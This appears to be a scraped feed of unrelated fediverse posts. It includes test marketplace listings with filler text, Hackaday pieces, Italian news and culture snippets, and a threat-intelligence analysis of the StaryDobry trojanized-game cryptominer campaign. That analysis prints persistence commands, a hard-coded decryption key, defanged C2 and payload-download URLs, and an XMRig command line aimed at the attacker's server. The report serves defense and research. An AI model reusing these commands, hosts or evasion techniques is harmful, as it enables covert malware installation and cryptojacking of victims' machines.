test 3 friendica - Questo è un post automatico da FediMercatino.it

Prezzo: 22 €

sdfs saf sa fsadf saf sa fsadf sada

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

test test - Questo è un post automatico da FediMercatino.it

Prezzo: 33 €

wefwe wfwe wefw we

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

If you’ve played any of the versions of Nintendo’s Animal Crossing over the years, you’ll know that eventually you get to the point where you’ve maxed out your virtual house and filled it with all the furniture you could possibly want — which is arguably as close to “winning” the game as you can get.

But now thanks to the work of [decrazyo] there’s a piece of furniture that you can add to your Animal Crossing house that will never get old: an x86 emulator that boots Linux. As explained in the video below, this trick leverages the fact that Nintendo had already built a highly accurate Nintendo Entertainment System (NES) emulator into Animal Crossing on the GameCube, which could be used to run a handful of classic games from within the player’s virtual living room. But it turns out that you can get that emulator to load a user-provided ROM from the GameCube’s memory card, which opens the doors to all sorts of mischief.

In this case, all [decrazyo] had to do was prepare an NES ROM that booted into Linux. That might seem like a tall order, but considering he had already worked on a port of Unix to the classic console, it’s not like he was going in blind. He identified the minimal Embeddable Linux Kernel Subset (ELKS) as his target operating system, but wanted to avoid the hassle of re-writing the whole thing for the 8-bit CPU in the NES. That meant adding another emulator to the mix.

If porting Linux to the NES sounded tough, running an x86 emulator on the console must be pure madness. But in reality, it’s not far off from several projects we’ve seen in the past. If you can boot Linux on an ATmega328 via an emulated RISC-V processor, why not x86 on the NES? In both cases, the only problem is performance: the emulated system ends up running at only a tiny fraction of real-speed, meaning booting a full OS could take hours.

As if things couldn’t get complicated enough, when [decrazyo] tried to boot the x86 emulator ROM, Animal Crossing choked. It turned out (perhaps unsurprisingly) that his ROM was using some features the emulator didn’t support, and was using twice as much RAM as normal. Some re-writes to the emulator sorted out the unsupported features, but there was no getting around the RAM limitation. Ultimately, [decrazyo] had to create a patch for Animal Crossing that doubled the memory of the in-game emulator.

Still with us? So the final setup is a patched Animal Crossing, which is running an in-game NES emulator, which is running a ROM that contains an x86 emulator, which is finally booting a minimal Linux environment at something like 1/64th normal speed. Are we having fun yet?

Despite its age and cutesy appearance, the original Animal Crossing has turned out to be a surprisingly fertile playground for hackers.

youtube.com/embed/OooHTDMUSGY?…

hackaday.com/2025/02/18/give-y…

Prezzo: 3 €

es esfse sesef es

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

C’è chi vive in tenda, chi in un edificio senza riscaldamento. I meno fortunati trovano un muro semi sicuro lungo la strada, costruiscono una struttura di legno e appoggiano sopra delle lenzuola come pareti. Tutti sono senza acqua corrente, senza bagno, senza cibo, senza abbastanza vestiti caldi, senza le medicine necessarie. Ci sono bimbi piccoli, alcuni piccolissimi, appena nati, donne incinte, anziani, malati, uomini e donne di ogni età.

iyezine.com/g4z4-surf-chronicl…

G4Z4 Surf Chronicles Update #1

G4Z4 Surf Chronicles Update #1 - C’è chi vive in tenda, chi in un edificio senza riscaldamento. I meno fortunati trovano un muro semi sicuro lungo la strada, costruiscono una struttura di legno e appoggiano sopra delle lenzuola come pareti.

^{Valentina Sala (In Your Eyes ezine)}

Introduction

On December 31, cybercriminals launched a mass infection campaign, aiming to exploit reduced vigilance and increased torrent traffic during the holiday season. Our telemetry detected the attack, which lasted for a month and affected individuals and businesses by distributing the XMRig cryptominer. This previously unidentified actor is targeting users worldwide—including in Russia, Brazil, Germany, Belarus and Kazakhstan—by spreading trojanized versions of popular games via torrent sites.

In this report, we analyze how the attacker evades detection and launches a sophisticated execution chain, employing a wide range of defense evasion techniques.

Kaspersky’s products detect this threat as
Trojan.Win64.StaryDobry.*, Trojan-Dropper.Win64.StaryDobry.*, HEUR:Trojan.Win64.StaryDobry.gen.

Initial infection

On December 31, while reviewing our telemetry, we first detected this massive infection. Further investigation revealed that the campaign was initially distributed via popular torrent trackers. Trojanized versions of popular games—such as BeamNG.drive, Garry’s Mod, Dyson Sphere Program, Universe Sandbox, and Plutocracy—were designed to launch a sophisticated infection chain, ultimately deploying a miner implant. These malicious releases were created in advance and uploaded around September 2024.

Infection timeline

Although the malicious releases were published by different authors, they were all cracked the same way.

Malicious torrent available for download

Among the compromised installers are popular simulator and sandbox games that require minimal disk space. Below is the distribution of affected users by game as of January 2025:

Infected users per game (download)

These releases, often referred to as “repacks”, were usually distributed in an archive. Let’s now take a closer look at one of the samples. Upon unpacking the archive, we found a trojanized installer.

Technical details

Trojanized installer

After launching the installer (a Windows 32-bit GUI executable), we were welcomed with a GUI screen showing three options: install the game, choose the language, or quit.

Installer screen

This installer was created with Inno Setup. After decompiling the installer, we examined its code and found an interesting functionality.

Decompiled installer code

This code is responsible for extracting the malicious files used in this attack. First, it decrypts unrar.dll using the DECR function, which is a proxy for the RARExtract function within the rar.dll library. RARExtract decrypts unrar.dll using AES encryption with a hard-coded key,
cls-precompx.dll. Next, additional files from the archive are dropped into the temporary directory, and execution proceeds to the RARGetDllVersion function within unrar.dll.

Unrar.dll dropper

First of all, the sample runs a series of methods to check if it’s being launched in a debugging environment. These methods search for debugger and sandbox modules injected into processes, and also check the registry and filesystem for certain popular software. If such software is detected, execution immediately terminates.

Anti-debug checks example

If the checks are passed, the malware executes cmd.exe to register unrar.dll as a command handler with regsvr32.exe. The sample attempts to query the following list of sites to determine the user’s IP address.
api.myip [.]com
ip-api [.]com
ipapi [.]co
freeipapi [.]com
ipwho [.]is
api.miip [.]my
This is done to identify the infected user’s location, specifically their country. If the malware fails to detect the IP address, it defaults the country code to
CNOrBY (meaning “China or Belarus”). Next, the sample sends a request to hxxps://pinokino[.]fun/donate_button/game_id=%s&donate_text=%s with the following substitutions:

• game_id = appended with DST_xxxx, where x represents digits. This value is passed as an argument from the installer; in this campaign, we discovered the variant DST_1448;
• donate_text = appended with the country code.

After this generic country check, the sample collects a fingerprint of the infected machine. This fingerprint consists of various parameters, forming a unique identifier as follows:
mac|machineId|username|country|windows|meminGB|numprocessors|video|game_id

This fingerprint is then encoded using URL-safe Base64 to be sent successfully over the network. Next, the malware retrieves MachineGUID from HKLM\Software\Microsoft\Cryptography and calculates its SHA256 checksum. It then collects 10 characters starting from the 20^th position (
SHA256(MachineGUID)[20:30]). This hexadecimal sequence is used as the filename for two newly created files: %SystemRoot%\%hash%.dat and %SystemRoot%\%hash%.efi. The first file contains the encoded fingerprint, while the second is an empty decoy. The creation time of the .dat file is spoofed with a random date between 01/01/2015 and 12/25/2021. This file stores the Base64-encoded fingerprint.
After this step, unrar.dll starts preparing to drop the decrypted MTX64.exe to the disk. First, it generates a new filename for the decrypted payload. The malware searches for files in %SystemRoot% or %SystemRoot%\Sysnative. If these directories are empty, the decrypted MTX64.exe is written to the disk as Windows.Graphics.ThumbnailHandler.dll. Otherwise, unrar.dll creates a new file and names it by choosing a random file from the specified directories, taking its name, trimming its extension and appending a random suffix from a predefined list. Besides suffixes, this list contains junk data, most likely added to evade signature-based detection.

Suffix list and junk data

For example, if the malware finds a file named msvc140.dll in %SystemRoot%, it removes the extension and appends the resulting
msvc140 with handler.dll (a random suffix from the list), resulting in msvc140handler.dll. The malware then writes the decrypted payload to the newly generated file in the %SystemRoot% folder.
After that, the sample opens the encrypted MTX64.exe and decrypts it using AES-128 with a hard-coded key,
cls-precompx.dll.
The loader also carries out resource spoofing. First of all, it scans the _res.rc file for DLL property names and values—such as CompanyName, FileVersion and so on—and creates a dictionary of (key, value) pairs. Then it takes a random DLL from the %SystemRoot% folder (exiting if nothing is found), extracts its property values using the VerQueryValueW WinAPI, and replaces the corresponding dictionary values. The resulting resources are embedded into the decrypted MTX64.exe DLL. This file is then saved under the name generated in the previous step. Finally, unrar.dll changes the creation time of the resulting DLL using the same spoofing method as for the fingerprint file.

Spoofed resources

The dropped DLL is installed using the following command:
cmd.exe /C "cd $system32 && regsvr32.exe /s %dropped_name%.dll"

MTX64

This DLL is based on a public project called EpubShellExtThumbnailHandler, a Windows Shell Extension Thumbnail Handler. This stage completely mimics the legitimate behavior up until the actual thumbnail handling. It gets registered as a .lnk (shortcut) file handler, so whenever a .lnk file is opened, the DLL tries to process its thumbnail. However, here the sample implements its own version of the GetThumbnail interface function, and creates a separate thread to perform its malicious activities.

First, this thread writes the current date and month in
dd-mm format to the %TEMP%\time_windows_com.ini file. This stage then retrieves MachineGUID from HKLM\SOFTWARE\Microsoft\Cryptography, calculates SHA256(MachineGUID)[20 : 30], just like unrar.dll did. After that, it checks %SystemRoot% for the .dat file with this name. The presence of this file confirms that the infection is uninterrupted, prompting the DLL to extract the fingerprint and make a query to the hard-coded threat actors’ domain in the following format, where the UID is the fingerprint’s SHA256 hash.hxxps://promouno[.]shop/check/uid=%s
The server sends back a JSON that looks like
{'code':'reg'}. After this, the DLL makes another query to the server with an additional field, data, which is the Base64-encoded fingerprint (uid remains the same):hxxps://promouno[.]shop/check/uid=%s&data=%s
Upon receiving this request, the server also sends a JSON. The malware checks its
code field, which must be equal to either 322 or 200. If it is, the sample proceeds to extract the MD5 checksum from the flmd field in the same JSON and download the next-stage payload from the following link:hxxps://promouno[.]shop/dloadm/uid=%s
Next, the sample calculates the MD5 checksum of the received payload (a kickstarter PE file), and checks this hash against the MD5 checksum from the JSON. If they match, the malware parses the PE structure to locate the Export Address Table, retrieves the
kickstarter function address, and executes it.

Kickstarter running

Kickstarter

The kickstarter PE has an encrypted blob in its resources. This stage reads the blob and stores it in a C++ vector of bytes.

Resource reading

After that, it chooses a random name for the payload using the same method as for MTX64.exe during the execution of unrar.dll. However, there is a difference: if nothing is found in %SystemRoot% or %SystemRoot%\Sysnative, it chooses Unix.Directory.IconHandler.dll as a default file name. The payload is saved to %appdata\Roaming\Microsoft\Credentials\%InstallDate%\. To locate the InstallDate directory, the DLL retrieves the system installation date from the registry subkey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate.

Then the blob is decrypted using the CryptoPP AES-128 implementation. The key consists of the sequence of bytes from
\x00 to \x10. The decrypted contents are written onto the disk. This executable also spoofs its resources using the same method as for MTX64.exe, after which it executes the following command:schtasks /create / tn %s /tr "regsvr32.exe /s %s" / st 00:00 /du 9999:59 / sc once / ri 1 /f
The first argument is the system installation date, while the second one is the path to the dropped DLL. A scheduled task to register a server with regsvr32.exe is created, using the first argument as its name, with a suppressed warning, set to trigger at 00:00. The loader sends a GET request to the hard-coded address
45.200.149[.]58/conf.txt, implicitly setting the request header to User-Agent: StupidSandwichAgent\r\n.
The loader then waits for a response from the server. If the response begins with act, the sample stops execution after creating the scheduled task. If the response is noactive, meaning the targeted device has not been registered previously, the sample tries to delete itself with the following command, which clears everything in the %temp% directory:

Cleanup

Unix.Directory.IconHandler.dll

Subsequently, Unix.Directory.IconHandler.dll creates a mutex named com_curruser_mttx. If this mutex has already been created, execution stops immediately. Then the DLL searches for the %TEMP%\_cache.binary file. If the sample can’t find it, it downloads the binary directly from
45.200.149[.]58 using a GET 44912.f request, with the same StupidSandwichAgent User-Agent header. This file is written to the temporary directory and then decrypted using AES-128 with the same key consisting of the \x00–\x10 byte sequence.
The sample proceeds to open the current process, look for SeDebugPrivilege in the process token, and adjust it if applicable. We believe this is done to inject code into a newly created cmd.exe process. The author chose the easiest way possible, copying the entire open source injector, including its debug strings:

Injector

After injecting the code into the command interpreter, the sample enters an endless loop, continuously checking for taskmgr.exe and procmon.exe in the list of running processes. If either process is detected, the sample is shut down.

Miner implant

This implant is a slightly modified XMRig miner executable. Instead of parsing command-line arguments, it constructs a predefined command line.
xmrig – url =45.200.149[.]58:1448 –algo= rx /0 –user=new-www –donate-level=1 –keepalive – nicehash –background –no-title –pass=x – cpu -max-threads-hint=%d
The last parameter is calculated from the CPU topology: the implant calls the GetSystemInfo API to check the number of processor cores. If there are fewer than 8, the miner does not start. Moreover, the attacker chose to host a mining pool server in their own infrastructure instead of using a public one.

XMRig parses the constructed command line using its built-in functionality. The miner also creates a separate thread to check for process monitors running in the system, using the same method as in the previous stage:

Anti-tracing

Victims

This campaign primarily targets regular users by distributing malicious repacks. Some organizations were also affected, but these seem to be compromised computers inside corporate infrastructures, rather than direct targets.

Most of the infections have been observed in Russia, with additional cases in Belarus, Kazakhstan, Germany, and Brazil.

Attribution

There are no clear links between this campaign and any previously known crimeware actors, making attribution difficult. However, the use of Russian language in the PDB suggests the campaign may have been developed by a Russian-speaking actor.

Conclusions

StaryDobry tends to be a one-shot campaign. To deliver the miner implant, the actors implemented a sophisticated execution chain that exploited users seeking free games. This approach helped the threat actors make the most out of the miner implant by targeting powerful gaming machines capable of sustaining mining activity. Additionally, the attacker’s use of DoH helped conceal communication with their infrastructure, making it harder to detect and trace the campaign.

Indicators of compromise

File hashes

15c0396687d4ff36657e0aa680d8ba42
461a0e74321706f5c99b0e92548a1986
821d29d3140dfd67fc9d1858f685e2ac
3c4d0a4dfd53e278b3683679e0656276
04b881d0a17b3a0b34cbdbf00ac19aa2
5cac1df1b9477e40992f4ee3cc2b06ed

Domains and IPs

45.200.149[.]58
45.200.149[.]146
45.200.149[.]148
hxxps://promouno[.]shop
hxxps://pinokino[.]fun

securelist.com/starydobry-camp…

Microsoft ha annunciato la rimozione della funzione Location History da Windows 10 e 11, eliminando di fatto la possibilità per le applicazioni di accedere alla cronologia delle posizioni del dispositivo. Una decisione che solleva interrogativi nel mondo della cybersecurity: una mossa per rafforzare la privacy o un cambiamento che potrebbe influenzare la sicurezza e la forensic analysis?

Cosa cambia con la rimozione della cronologia delle posizioni?

La funzione Location History consentiva ad applicazioni come Cortana di accedere alla posizione del dispositivo registrata nelle ultime 24 ore. Con la sua rimozione, questi dati non verranno più salvati localmente e l’opzione sparirà dalle impostazioni di Windows (Privacy & Security > Location).

Microsoft ha dichiarato: “Stiamo deprecando e rimuovendo la funzione Location History, un’API che permetteva a Cortana di accedere alle ultime 24 ore di cronologia delle posizioni del dispositivo quando la localizzazione era abilitata.”

L’API Geolocator.GetGeopositionHistoryAsync, che permetteva l’accesso ai dati memorizzati localmente, verrà dismessa. Ciò significa che le app non potranno più recuperare automaticamente le posizioni passate del dispositivo, eliminando un potenziale vettore di attacco ma anche uno strumento di monitoraggio.

Impatto sulla sicurezza e sulla forensic analysis

Questa decisione si inserisce in un trend più ampio di maggiore attenzione alla privacy, seguendo normative come GDPR e CCPA, che impongono restrizioni più severe sulla raccolta e conservazione dei dati personali. Tuttavia, la rimozione di questa funzione potrebbe avere effetti collaterali imprevisti:

• Limitazione delle indagini forensi: gli analisti di sicurezza spesso usano dati di localizzazione per individuare attività sospette o analizzare movimenti legati a minacce informatiche.
• Meno strumenti per le aziende: alcune organizzazioni utilizzano la cronologia delle posizioni per verificare accessi anomali o per migliorare la protezione dei dispositivi aziendali.
• Riduzione del rischio di esfiltrazione: la rimozione della cronologia delle posizioni potrebbe diminuire la superficie di attacco per i cybercriminali che sfruttano questi dati per tracciare utenti o pianificare attacchi mirati.

Microsoft consiglia agli sviluppatori di rivedere le proprie applicazioni e migrare verso nuove soluzioni che non dipendano dalla funzione obsoleta. Per gli utenti, invece, il consiglio è:

1. Disattivare i servizi di localizzazione nelle impostazioni di Windows se non necessari.
2. Cliccare su “Clear” per cancellare eventuali dati di posizione registrati nelle ultime 24 ore.

Privacy o limitazione della sicurezza?

Se da una parte Microsoft si allinea alla crescente richiesta di maggiore privacy e controllo sui dati, dall’altra questa rimozione potrebbe creare disagi a chi sfruttava la cronologia delle posizioni per funzioni avanzate, costringendo sviluppatori e aziende a ripensare le proprie strategie. Sarà interessante vedere quali soluzioni alternative emergeranno per colmare questo vuoto.

In un mondo digitale sempre più complesso e minaccioso, la vera sfida sarà trovare il giusto equilibrio tra tutela della privacy e capacità di difesa dalle minacce informatiche, senza compromettere né la sicurezza né l’innovazione.

L'articolo Microsoft elimina la cronologia delle posizioni su Windows. Scelta di privacy o rischio sicurezza? proviene da il blog della sicurezza informatica.

Logically we understand that the other planets in the solar system, as well as humanity’s contributions to the cosmos such as the Hubble Space Telescope and the International Space Station, are zipping around us somewhere — but it can be difficult to conceptualize. Is Jupiter directly above your desk? Is the ISS currently underneath you?

If you’ve ever found yourself wondering such things, you might want to look into making something like Space Monitor. Designed by [Kevin Assen], this little gadget is able to literally point out the locations of objects in space. Currently it’s limited to the ISS and Mars, but adding new objects to track is just a matter of loading in the appropriate orbital data.

In addition to slewing around its 3D printed indicator, the Space Monitor also features a round LCD that displays the object currently being tracked, as well as the weather. Reading through the list of features and capabilities of the ESP32-powered device, we get the impression that [Kevin] is using it as a sort of development platform for various concepts. Features like remote firmware updates and the ability to point smartphones to the device’s configuration page via on-screen QR aren’t necessarily needed on a personal-use device, but its great practice for when you do eventually send one of your creations out into the scary world beyond your workbench.

If you’re interested in something a bit more elaborate, check out this impressive multi-level satellite tracker we covered back in 2018.

youtube.com/embed/6-wM_a_eX-g?…

hackaday.com/2025/02/18/space-…

Patriota con la suit di Omni-Man. Tanto basta per descrivere Mr.Okay. La differenza è che, il nostro, non ha un bisogno emotivo, adulatorio, da parte delle persone, ma le loro manifestazioni d'affetto sono la sua linfa vitale... altrimenti lungi da lui ergersi a protettore della razza umana.

iyezine.com/mr-ok-collettivo-k…

Mr. Ok - Collettivo Korm Ent

Mr. Ok - Collettivo Korm Ent - Patriota con la suit di Omni-Man, Mr. Okay esplora cosa siamo disposti a rinunciare per la pace. Scopri le sue gesta nel libro del collettivo Korm Ent. - Mr. Ok

^{Claudio Frandina (In Your Eyes ezine)}

Se volete farvi un regalo, vi consiglio di ascoltare questa interessantissima puntata de "il Mondo", che ascolto quasi tutte le mattine e trovo molto utile per approfondire alcune notizie.

In questa puntata si parla delle ragioni che hanno portato la #spagna ad essere una delle economie maggiormente in crescita nel 2024, ma c'è anche molto di più.

Nella seconda parte viene esposto un ragionamento sul clima che condivido e trovo interessantissimo, sul ruolo di Musk, sul catastrofico ruolo degli Stati Uniti e sulla generale indifferenza di tutti, cittadini ed istituzioni europee.

Crudo, ma da ascoltare per cominciare a cambiare.

Ascoltate e condividetene tutti 😊

Internazionale

2025-02-17 08:57:09

Nella puntata di oggi del Mondo: l’economia spagnola va sempre meglio. Come far ripartire la lotta al cambiamento climatico. Con Mariangela Paone e Ferdinando Cotugno.

Il Mondo

Il Mondo

Il podcast quotidiano di Internazionale. Tutte le mattine alle 6. 30 con Claudio Rossi Marcelli e Giulia Zoli. Scegli una prospettiva più ampia sul mondo.

^{Internazionale}